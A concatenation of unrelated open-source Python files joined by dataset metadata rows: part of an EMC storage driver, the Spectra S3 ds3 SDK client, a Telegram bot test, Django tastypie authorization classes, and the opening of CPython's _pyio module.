:returns: remainingCapacityGb
"""
remainingCapacityGb = -1
storageConfigService = (
self.utils.find_storage_configuration_service(
conn, systemName))
supportedSizeDict = (
self.get_volume_range(
conn, storageConfigService, srpPoolInstanceName,
arrayInfo['SLO'], arrayInfo['Workload'],
None))
try:
# Information source is V3.
if supportedSizeDict['EMCInformationSource'] == INFO_SRC_V3:
remainingCapacityGb = self.utils.convert_bits_to_gbs(
supportedSizeDict['EMCRemainingSLOCapacity'])
LOG.debug("Received remaining SLO Capacity "
"%(remainingCapacityGb)s GBs for SLO "
"%(SLO)s and workload %(workload)s.",
{'remainingCapacityGb': remainingCapacityGb,
'SLO': arrayInfo['SLO'],
'workload': arrayInfo['Workload']})
except KeyError:
pass
return remainingCapacityGb
def extend_volume_in_SG(
self, conn, storageConfigService, volumeInstanceName,
volumeName, volumeSize, extraSpecs):
"""Extend a volume instance.
:param conn: connection to the ecom server
:param storageConfigservice: the storage configuration service
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name (String)
:param volumeSize: the volume size
:param extraSpecs: additional info
:returns: volumeDict
:returns: int -- return code
:raises: VolumeBackendAPIException
"""
startTime = time.time()
rc, job = conn.InvokeMethod(
'CreateOrModifyElementFromStoragePool',
storageConfigService, TheElement=volumeInstanceName,
Size=self.utils.get_num(volumeSize, '64'))
LOG.debug("Extend Volume: %(volumename)s. Return code: %(rc)lu.",
{'volumename': volumeName,
'rc': rc})
if rc != 0:
rc, error_desc = self.utils.wait_for_job_complete(conn, job,
extraSpecs)
if rc != 0:
exceptionMessage = (_(
"Error Extend Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s.")
% {'volumeName': volumeName,
'rc': rc,
'error': error_desc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
LOG.debug("InvokeMethod CreateOrModifyElementFromStoragePool "
"took: %(delta)s H:MM:SS.",
{'delta': self.utils.get_time_delta(startTime,
time.time())})
# Find the newly created volume.
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
| apache-2.0 | 5,956,583,277,462,807,000 | 41.79786 | 79 | 0.575167 | false |
chanchett/ds3_python_sdk_ | ds3/ds3.py | 1 | 30418 | # Copyright 2014-2015 Spectra Logic Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from ctypes import *
import libds3
def checkExistence(obj, wrapper = lambda ds3Str: ds3Str.contents.value):
if obj:
return wrapper(obj)
else:
return None
def arrayToList(array, length, wrapper = lambda ds3Str: ds3Str.contents.value):
result = []
for i in xrange(0, length):
result.append(wrapper(array[i]))
return result
class Ds3Error(Exception):
def __init__(self, libds3Error):
self.reason = libds3Error.contents.message.contents.value
response = libds3Error.contents.error
self._hasResponse = False
self.statusCode = None
self.statusMessage = None
self.message = None
if response:
self._hasResponse = True
self.statusCode = response.contents.status_code
self.statusMessage = response.contents.status_message.contents.value
self.message = checkExistence(response.contents.error_body)
libds3.lib.ds3_free_error(libds3Error)
def __str__(self):
errorMessage = "Reason: " + self.reason
if self._hasResponse:
errorMessage += " | StatusCode: " + str(self.statusCode)
errorMessage += " | StatusMessage: " + self.statusMessage
if self.message:
errorMessage += " | Message: " + self.message
return errorMessage
def __repr__(self):
return self.__str__()
class Credentials(object):
def __init__(self, accessKey, secretKey):
self.accessKey = accessKey
self.secretKey = secretKey
class Ds3Bucket(object):
def __init__(self, ds3Bucket):
self.name = ds3Bucket.name.contents.value
self.creationDate = ds3Bucket.creation_date.contents.value
def __str__(self):
return "Name: " + self.name + " | Creation Date: " + self.creationDate
def __repr__(self):
return self.__str__()
class Ds3Owner(object):
def __init__(self, ds3Owner):
ownerContents = ds3Owner.contents
self.name = ownerContents.name.contents.value
self.id = ownerContents.id.contents.value
def __str__(self):
return "Name: " + self.name + " | ID: " + self.id
def __repr__(self):
return self.__str__()
class Ds3Object(object):
def __init__(self, ds3Object):
self.name = ds3Object.name.contents.value
self.etag = checkExistence(ds3Object.etag)
self.size = ds3Object.size
self.owner = Ds3Owner(ds3Object.owner)
def __str__(self):
return "Name: " + self.name + " | Size: " + str(self.size) + " | Etag: " + str(self.etag) + " | Owner: " + str(self.owner)
def __repr__(self):
return self.__str__()
class Ds3BucketDetails(object):
def __init__(self, ds3Bucket):
bucketContents = ds3Bucket.contents
self.name = bucketContents.name.contents.value
self.creationDate = checkExistence(bucketContents.creation_date)
self.isTruncated = bool(bucketContents.is_truncated)
self.marker = checkExistence(bucketContents.marker)
self.delimiter = checkExistence(bucketContents.delimiter)
self.maxKeys = bucketContents.max_keys
self.nextMarker = checkExistence(bucketContents.next_marker)
self.prefix = checkExistence(bucketContents.prefix)
self.commonPrefixes = arrayToList(bucketContents.common_prefixes, bucketContents.num_common_prefixes)
self.objects = arrayToList(bucketContents.objects, bucketContents.num_objects, wrapper = Ds3Object)
class Ds3BulkObject(object):
def __init__(self, bulkObject):
self.name = bulkObject.name.contents.value
self.length = bulkObject.length
self.offset = bulkObject.offset
self.inCache = bool(bulkObject.in_cache)
def __str__(self):
return "Name:" + self.name + " | Length: " + str(self.length) + " | Offset: " + str(self.offset) + " | InCache: " + str(self.inCache)
def __repr__(self):
return self.__str__()
class Ds3CacheList(object):
def __init__(self, bulkObjectList):
contents = bulkObjectList.contents
self.chunkNumber = contents.chunk_number
self.nodeId = checkExistence(contents.node_id)
self.serverId = checkExistence(contents.server_id)
self.chunkId = contents.chunk_id.contents.value
self.objects = arrayToList(contents.list, contents.size, wrapper = Ds3BulkObject)
class Ds3BulkPlan(object):
def __init__(self, ds3BulkResponse):
contents = ds3BulkResponse.contents
self.bucketName = checkExistence(contents.bucket_name)
if contents.cached_size_in_bytes:
self.cachedSize = contents.cached_size_in_bytes
if contents.completed_size_in_bytes:
self.compltedSize = contents.completed_size_in_bytes
self.jobId = checkExistence(contents.job_id)
if contents.original_size_in_bytes:
self.originalSize = contents.original_size_in_bytes
self.startDate = checkExistence(contents.start_date)
self.userId = checkExistence(contents.user_id)
self.userName = checkExistence(contents.user_name)
self.requestType = contents.request_type
self.status = contents.status
self.chunks = arrayToList(contents.list, contents.list_size, wrapper = Ds3CacheList)
def __str__(self):
response = "JobId: " + self.jobId
response += " | Status: " + str(self.status)
response += " | Request Type: " + str(self.requestType)
response += " | BucketName: " + self.bucketName
response += " | UserName: " + self.userName
response += " | Chunks: " + str(self.chunks)
return response
def __repr__(self):
return self.__str__()
class Ds3AllocateChunkResponse(object):
def __init__(self, ds3AllocateChunkResponse):
contents = ds3AllocateChunkResponse.contents
self.retryAfter = contents.retry_after
self.chunk = Ds3CacheList(contents.objects)
class Ds3AvailableChunksResponse(object):
def __init__(self, ds3AvailableChunksResponse):
contents = ds3AvailableChunksResponse.contents
self.retryAfter = contents.retry_after
self.bulkPlan = Ds3BulkPlan(contents.object_list)
class Ds3SearchObject(object):
def __init__(self, ds3SearchObject):
contents = ds3SearchObject.contents
self.bucketId = checkExistence(contents.bucket_id)
self.id = checkExistence(contents.id)
self.name = checkExistence(contents.name)
self.size = contents.size
self.owner = checkExistence(contents.owner, wrapper = Ds3Owner)
self.lastModified = checkExistence(contents.last_modified)
self.storageClass = checkExistence(contents.storage_class)
self.type = checkExistence(contents.type)
self.version = checkExistence(contents.version)
def __str__(self):
response = "BucketId: " + str(self.bucketId)
response += " | Id: " + str(self.id)
response += " | Name: " + str(self.name)
response += " | Size: " + str(self.size)
response += " | Owner: (" + str(self.id) + ")"
response += " | LastModified: " + str(self.lastModified)
response += " | StorageClass: " + str(self.storageClass)
response += " | Type: " + str(self.type)
response += " | Version: " + str(self.version)
return response
class Ds3BuildInformation(object):
def __init__(self, ds3BuildInfo):
contents = ds3BuildInfo.contents
self.branch = checkExistence(contents.branch)
self.revision = checkExistence(contents.revision)
self.version = checkExistence(contents.version)
def __str__(self):
response = "Branch: " + str(self.branch)
response += " | Revision: " + str(self.revision)
response += " | Version: " + str(self.version)
return response
class Ds3SystemInformation(object):
def __init__(self, ds3SystemInfo):
contents = ds3SystemInfo.contents
self.apiVersion = checkExistence(contents.api_version)
self.serialNumber = checkExistence(contents.serial_number)
self.buildInformation = checkExistence(contents.build_information, wrapper = Ds3BuildInformation)
def __str__(self):
response = "API Version: " + str(self.apiVersion)
response += " | Serial Number: " + str(self.serialNumber)
response += " | Build Information: " + str(self.buildInformation)
return response
class Ds3SystemHealthInformation(object):
def __init__(self, ds3HealthInfo):
contents = ds3HealthInfo.contents
self.msRequiredToVerifyDataPlannerHealth = contents.ms_required_to_verify_data_planner_health
def typeCheck(input_arg, type_to_check):
if isinstance(input_arg, type_to_check):
return input_arg
else:
raise TypeError("expected instance of type " + type_to_check.__name__ + ", got instance of type " + type(input_arg).__name__)
def typeCheckString(input_arg):
return typeCheck(input_arg, basestring)
def enumCheck(input_arg, enum_dict):
if input_arg in enum_dict.keys():
return enum_dict[input_arg]
else:
raise TypeError("expected value to be one of " + str(enum_dict.keys()) + ", got " + str(input_arg))
def enumCheckDs3ObjectType(input_arg):
return enumCheck(input_arg, {"DATA":0, "FOLDER":1})
def addMetadataToRequest(request, metadata):
if metadata:
for key in metadata:
if type(metadata[key]) is list or type(metadata[key]) is tuple:
for value in metadata[key]:
libds3.lib.ds3_request_set_metadata(request, key, value);
else:
libds3.lib.ds3_request_set_metadata(request, key, metadata[key]);
def extractMetadataFromResponse(metaData):
result = {}
keys = libds3.lib.ds3_metadata_keys(metaData)
if keys:
for key_index in xrange(0, keys.contents.num_keys):
key = keys.contents.keys[key_index].contents.value
metadataEntry = libds3.lib.ds3_metadata_get_entry(metaData, key)
result[key] = arrayToList(metadataEntry.contents.values, metadataEntry.contents.num_values)
libds3.lib.ds3_free_metadata_entry(metadataEntry)
libds3.lib.ds3_free_metadata_keys(keys)
return result
def createClientFromEnv():
libDs3Client = POINTER(libds3.LibDs3Client)()
error = libds3.lib.ds3_create_client_from_env(byref(libDs3Client))
if error:
raise Ds3Error(error)
clientContents = libDs3Client.contents
clientCreds = clientContents.creds.contents
creds = Credentials(clientCreds.access_id.contents.value, clientCreds.secret_key.contents.value)
proxyValue = checkExistence(clientContents.proxy)
client = Ds3Client(clientContents.endpoint.contents.value, creds, proxyValue)
libds3.lib.ds3_free_creds(clientContents.creds)
libds3.lib.ds3_free_client(libDs3Client)
return client
class Ds3Client(object):
'''
This object is used to communicate with a remote DS3/Spectra S3 endpoint. All communication with the Spectra S3 API is done with this class.
'''
def __init__(self, endpoint, credentials, proxy = None):
self._ds3Creds = libds3.lib.ds3_create_creds(c_char_p(credentials.accessKey), c_char_p(credentials.secretKey))
self._client = libds3.lib.ds3_create_client(c_char_p(endpoint), self._ds3Creds)
self.credentials = credentials
def verifySystemHealth(self):
'''
Returns how long it took to verify the health of the system. In the event that the system is in a bad state, an error will
be thrown.
'''
response = POINTER(libds3.LibDs3VerifySystemHealthResponse)()
request = libds3.lib.ds3_init_verify_system_health()
error = libds3.lib.ds3_verify_system_health(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemHealthInformation(response)
libds3.lib.ds3_free_verify_system_health(response)
return result
def getService(self):
'''
Returns a list of all the buckets the current access id has access to.
'''
response = POINTER(libds3.LibDs3GetServiceResponse)()
request = libds3.lib.ds3_init_get_service()
error = libds3.lib.ds3_get_service(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
contents = response.contents
for i in xrange(0, response.contents.num_buckets):
yield Ds3Bucket(contents.buckets[i])
libds3.lib.ds3_free_service_response(response)
def getBucket(self, bucketName, prefix = None, nextMarker = None, delimiter = None, maxKeys = None):
'''
Returns a list of all the objects in a specific bucket as specified by `bucketName`. This will return at most 1000 objects.
In order to retrieve more, pagination must be used. The `nextMarker` is used to specify where the next 1000 objects will
start listing from.
`delimiter` can be used to list objects like directories. So for example, if delimiter is set to '/' then it will return
a list of 'directories' in the commons prefixes field in the response. In order to list all the files in that directory use the prefix parameter.
For example:
client.getBucket("my_bucket", prefix = 'dir', delimiter = '/')
The above will list any files and directories that are in the 'dir' directory.
'''
response = POINTER(libds3.LibDs3GetBucketResponse)()
request = libds3.lib.ds3_init_get_bucket(typeCheckString(bucketName))
if prefix:
libds3.lib.ds3_request_set_prefix(request, typeCheckString(prefix))
if nextMarker:
libds3.lib.ds3_request_set_marker(request, nextMarker)
if delimiter:
libds3.lib.ds3_request_set_delimiter(request, typeCheckString(delimiter))
if maxKeys:
libds3.lib.ds3_request_set_max_keys(request, maxKeys)
error = libds3.lib.ds3_get_bucket(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bucket = Ds3BucketDetails(response)
libds3.lib.ds3_free_bucket_response(response)
return bucket
def headObject(self, bucketName, objectName):
'''
Returns the metadata for the retrieved object as a dictionary of lists. If the object does not exist
an error is thrown with a status code of 404.
'''
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_head_object(typeCheckString(bucketName), typeCheckString(objectName))
error = libds3.lib.ds3_head_object(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def headBucket(self, bucketName):
'''
Checks whether a bucket exists.
'''
request = libds3.lib.ds3_init_head_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_head_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteFolder(self, bucketName, folderName):
'''
Deletes a folder and all the objects contained within it.
'''
request = libds3.lib.ds3_init_delete_folder(typeCheckString(bucketName), typeCheckString(folderName))
error = libds3.lib.ds3_delete_folder(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getSystemInformation(self):
'''
Returns the version and other information about the Spectra S3 endpoint.
'''
response = POINTER(libds3.LibDs3GetSystemInformationResponse)()
request = libds3.lib.ds3_init_get_system_information()
error = libds3.lib.ds3_get_system_information(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemInformation(response)
libds3.lib.ds3_free_get_system_information(response)
return result
def getObject(self, bucketName, objectName, offset, jobId, realFileName = None):
'''
Gets an object from the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are getting from Spectra S3 does not match what will be on the local filesystem.
Returns the metadata for the retrieved object as a dictionary, where keys are
associated with a list of the values for that key.
This can only be used within the context of a Bulk Get Job.
'''
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_get_object_for_job(typeCheckString(bucketName), objectName, offset, jobId)
localFile = open(effectiveFileName, "w")
error = libds3.lib.ds3_get_object_with_metadata(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_write_to_fd, byref(response))
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def putBucket(self, bucketName):
'''
Creates a new bucket where objects can be stored.
'''
bucketName = typeCheckString(bucketName)
request = libds3.lib.ds3_init_put_bucket(bucketName)
error = libds3.lib.ds3_put_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putObject(self, bucketName, objectName, offset, size, jobId, realFileName = None, metadata = None):
'''
Puts an object to the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are putting to Spectra S3 does not match what is on the local filesystem.
Use metadata to set the metadata for the object. metadata's value should be
a dictionary, where keys are associated with either a value or a list of the
values for that key.
This can only be used within the context of a Spectra S3 Bulk Put job.
'''
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
request = libds3.lib.ds3_init_put_object_for_job(typeCheckString(bucketName), objectName, offset, size, jobId)
addMetadataToRequest(request, metadata)
localFile = open(effectiveFileName, "r")
error = libds3.lib.ds3_put_object(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_read_from_fd)
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObject(self, bucketName, objName):
'''
Deletes an object from the specified bucket. If deleting several files at once, use `deleteObjects` instead.
'''
request = libds3.lib.ds3_init_delete_object(typeCheckString(bucketName), typeCheckString(objName))
error = libds3.lib.ds3_delete_object(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObjects(self, bucketName, fileNameList):
'''
Deletes multiple objects from the bucket using a single API call.
'''
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
request = libds3.lib.ds3_init_delete_objects(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_objects(self._client, request, bulkObjs)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteBucket(self, bucketName):
'''
Deletes a bucket. If the bucket is not empty, then this request will fail. All objects must be deleted first
before the bucket can be deleted.
'''
request = libds3.lib.ds3_init_delete_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putBulk(self, bucketName, fileInfoList):
'''
Initiates a start bulk put with the remote Spectra S3 endpoint. The `fileInfoList` is a list of (objectName, size) tuples.
`objectName` does not have to be the actual name on the local file system, but it will be the name that you must
initiate a single object put to later. `size` must reflect the actual size of the file that is being put.
'''
bulkObjs = libds3.lib.ds3_init_bulk_object_list(len(fileInfoList))
bulkObjsList = bulkObjs.contents.list
for i in xrange(0, len(fileInfoList)):
bulkObjsList[i].name = libds3.lib.ds3_str_init(fileInfoList[i][0])
bulkObjsList[i].length = fileInfoList[i][1]
response = POINTER(libds3.LibDs3BulkResponse)()
request = libds3.lib.ds3_init_put_bulk(typeCheckString(bucketName), bulkObjs)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getBulk(self, bucketName, fileNameList, chunkOrdering = True):
'''
Initiates a start bulk get with the remote Spectra S3 endpoint. All the files that will be retrieved must be specified in
`fileNameList`.
'''
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
response = POINTER(libds3.LibDs3BulkResponse)()
chunkOrderingValue = libds3.LibDs3ChunkOrdering.IN_ORDER
if not chunkOrdering:
chunkOrderingValue = libds3.LibDs3ChunkOrdering.NONE
request = libds3.lib.ds3_init_get_bulk(typeCheckString(bucketName), bulkObjs, chunkOrderingValue)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getObjects(self, bucketName = None, creationDate = None, objId = None, name = None, pageLength = None, pageOffset = None, objType = None, version = None):
'''
Returns a list of objects.
'''
# TODO: need to add an example here of what different query strings are supported
request = libds3.lib.ds3_init_get_objects()
response = POINTER(libds3.LibDs3GetObjectsResponse)()
if bucketName:
libds3.lib.ds3_request_set_bucket_name(request, typeCheckString(bucketName))
if creationDate:
libds3.lib.ds3_request_set_creation_date(request, typeCheckString(creationDate))
if objId:
libds3.lib.ds3_request_set_id(request, typeCheckString(objId))
if name:
libds3.lib.ds3_request_set_name(request, typeCheckString(name))
if pageLength:
libds3.lib.ds3_request_set_page_length(request, typeCheckString(str(pageLength)))
if pageOffset:
libds3.lib.ds3_request_set_page_offset(request, typeCheckString(str(pageOffset)))
if objType:
libds3.lib.ds3_request_set_type(request, enumCheckDs3ObjectType(objType))
if version:
libds3.lib.ds3_request_set_version(request, typeCheckString(str(version)))
error = libds3.lib.ds3_get_objects(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = arrayToList(response.contents.objects, response.contents.num_objects, wrapper = Ds3SearchObject)
libds3.lib.ds3_free_objects_response(response)
return result
def allocateChunk(self, chunkId):
'''
*Deprecated* - Allocates a specific chunk to be allocated in cache so that the objects in that chunk can safely be put without a need
to handle 307 redirects.
'''
request = libds3.lib.ds3_init_allocate_chunk(chunkId)
response = POINTER(libds3.LibDs3AllocateChunkResponse)()
error = libds3.lib.ds3_allocate_chunk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AllocateChunkResponse(response)
libds3.lib.ds3_free_allocate_chunk_response(response)
return result
def getAvailableChunks(self, jobId):
'''
Returns a list of all chunks in a job that can currently be processed. It will return a subset of all chunks, and it
will return that same set of chunks until all the data in one of the chunks returned has been either completely gotten,
or been completely put.
'''
request = libds3.lib.ds3_init_get_available_chunks(jobId)
response = POINTER(libds3.LibDs3GetAvailableChunksResponse)()
error = libds3.lib.ds3_get_available_chunks(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AvailableChunksResponse(response)
libds3.lib.ds3_free_available_chunks_response(response)
return result
def _sendJobRequest(self, func, request):
response = POINTER(libds3.LibDs3BulkResponse)()
error = func(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getJob(self, jobId):
'''
Returns information about a job, including all the chunks in the job, as well as the status of the job.
'''
request = libds3.lib.ds3_init_get_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_get_job, request)
def getJobs(self):
'''
Returns a list of all jobs.
'''
request = libds3.lib.ds3_init_get_jobs()
response = POINTER(libds3.LibDs3GetJobsResponse)()
error = libds3.lib.ds3_get_jobs(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = []
for index in xrange(0, response.contents.jobs_size):
result.append(Ds3BulkPlan(response.contents.jobs[index]))
libds3.lib.ds3_free_get_jobs_response(response)
return result
def putJob(self, jobId):
'''
Modifies a job to reset the timeout timer for the job.
'''
request = libds3.lib.ds3_init_put_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_put_job, request)
def deleteJob(self, jobId):
'''
Cancels a currently in progress job.
'''
request = libds3.lib.ds3_init_delete_job(jobId)
error = libds3.lib.ds3_delete_job(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getPhysicalPlacement(self, bucketName, fileNameList, fullDetails = False):
'''
Returns where in the Spectra S3 system each file in `fileNameList` is located.
'''
response = POINTER(libds3.LibDs3GetPhysicalPlacementResponse)()
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
bucketName=typeCheckString(bucketName)
if fullDetails:
request = libds3.lib.ds3_init_get_physical_placement(bucketName, bulkObjs)
else:
request = libds3.lib.ds3_init_get_physical_placement_full_details(bucketName, bulkObjs)
error = libds3.lib.ds3_get_physical_placement(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
placements = []
if response:
placements = arrayToList(response.contents.tapes, response.contents.num_tapes, lambda obj: obj.barcode.contents.value)
libds3.lib.ds3_free_get_physical_placement_response(response)
return placements
| apache-2.0 | 667,016,001,873,500,500 | 42.148041 | 162 | 0.642284 | false |
rogerscristo/BotFWD | env/lib/python3.6/site-packages/pytests/test_inputtextmessagecontent.py | 1 | 3394 | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
import json
import pytest
from telegram import InputTextMessageContent, InputMessageContent, ParseMode
@pytest.fixture()
def json_dict():
return {
'parse_mode': TestInputTextMessageContent.parse_mode,
'message_text': TestInputTextMessageContent.message_text,
'disable_web_page_preview': TestInputTextMessageContent.disable_web_page_preview,
}
@pytest.fixture(scope='class')
def input_text_message_content():
return InputTextMessageContent(TestInputTextMessageContent.message_text,
parse_mode=TestInputTextMessageContent.parse_mode,
disable_web_page_preview=TestInputTextMessageContent.disable_web_page_preview)
class TestInputTextMessageContent:
message_text = '*message text*'
parse_mode = ParseMode.MARKDOWN
disable_web_page_preview = True
def test_de_json(self, json_dict, bot):
input_text_message_content_json = InputTextMessageContent.de_json(json_dict, bot)
assert input_text_message_content_json.parse_mode == self.parse_mode
assert input_text_message_content_json.message_text == self.message_text
assert input_text_message_content_json.disable_web_page_preview == \
self.disable_web_page_preview
def test_input_text_message_content_json_de_json_factory(self, json_dict, bot):
input_text_message_content_json = InputMessageContent.de_json(json_dict, bot)
assert isinstance(input_text_message_content_json, InputTextMessageContent)
def test_de_json_factory_without_required_args(self, json_dict, bot):
del (json_dict['message_text'])
input_text_message_content_json = InputMessageContent.de_json(json_dict, bot)
assert input_text_message_content_json is None
def test_to_json(self, input_text_message_content):
json.loads(input_text_message_content.to_json())
def test_to_dict(self, input_text_message_content):
input_text_message_content_dict = input_text_message_content.to_dict()
assert isinstance(input_text_message_content_dict, dict)
assert input_text_message_content_dict['message_text'] == \
input_text_message_content.message_text
assert input_text_message_content_dict['parse_mode'] == \
input_text_message_content.parse_mode
assert input_text_message_content_dict['disable_web_page_preview'] == \
input_text_message_content.disable_web_page_preview
| mit | -1,011,318,621,333,283,700 | 40.962025 | 113 | 0.696818 | false |
mohabusama/django-users-api | users_api/authorization.py | 1 | 1626 | from tastypie.exceptions import Unauthorized
from tastypie.authorization import Authorization, DjangoAuthorization
class UsersDjangoAuthorization(DjangoAuthorization):
def update_detail(self, object_list, bundle):
if bundle.request.user.id == bundle.obj.id:
return True
return super(UsersDjangoAuthorization, self).update_detail(
object_list, bundle)
class AdminOnlyAuthorization(Authorization):
def _is_authorized_list(self, object_list, bundle):
if bundle.request.user.is_superuser:
return object_list
raise Unauthorized('Admin only access.')
def _is_authorized_detail(self, object_list, bundle):
return bundle.request.user.is_superuser
def read_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def read_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
def create_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def create_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
def update_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def update_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
def delete_list(self, object_list, bundle):
return self._is_authorized_list(object_list, bundle)
def delete_detail(self, object_list, bundle):
return self._is_authorized_detail(object_list, bundle)
| mit | 7,692,832,456,572,050,000 | 34.347826 | 69 | 0.700492 | false |
batermj/algorithm-challenger | code-analysis/programming_anguage/python/source_codes/Python3.8.0/Python-3.8.0/Lib/_pyio.py | 1 | 93037 | """
Python implementation of the io module.
"""
import os
import abc
import codecs
import errno
import stat
import sys
# Import _thread instead of threading to reduce startup cost
from _thread import allocate_lock as Lock
if sys.platform in {'win32', 'cygwin'}:
from msvcrt import setmode as _setmode
else:
_setmode = None
import io
from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)
valid_seek_flags = {0, 1, 2} # Hardwired values
if hasattr(os, 'SEEK_HOLE') :
valid_seek_flags.add(os.SEEK_HOLE)
valid_seek_flags.add(os.SEEK_DATA)
# open() uses st_blksize whenever we can
DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes
# NOTE: Base classes defined here are registered with the "official" ABCs
# defined in io.py. We don't use real inheritance though, because we don't want
# to inherit the C implementations.
# Rebind for compatibility
BlockingIOError = BlockingIOError
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
_IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def open(file, mode="r", buffering=-1, encoding=None, errors=None,
newline=None, closefd=True, opener=None):
r"""Open file and return a stream. Raise OSError upon failure.
file is either a text or byte string giving the name (and the path
if the file isn't in the current working directory) of the file to
be opened or an integer file descriptor of the file to be
wrapped. (If a file descriptor is given, it is closed when the
returned I/O object is closed, unless closefd is set to False.)
mode is an optional string that specifies the mode in which the file is
opened. It defaults to 'r' which means open for reading in text mode. Other
common values are 'w' for writing (truncating the file if it already
exists), 'x' for exclusive creation of a new file, and 'a' for appending
(which on some Unix systems, means that all writes append to the end of the
file regardless of the current seek position). In text mode, if encoding is
not specified the encoding used is platform dependent. (For reading and
writing raw bytes use binary mode and leave encoding unspecified.) The
available modes are:
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
The default mode is 'rt' (open for reading text). For binary random
access, the mode 'w+b' opens and truncates the file to 0 bytes, while
'r+b' opens the file without truncation. The 'x' mode implies 'w' and
raises an `FileExistsError` if the file already exists.
Python distinguishes between files opened in binary and text modes,
even when the underlying operating system doesn't. Files opened in
binary mode (appending 'b' to the mode argument) return contents as
bytes objects without any decoding. In text mode (the default, or when
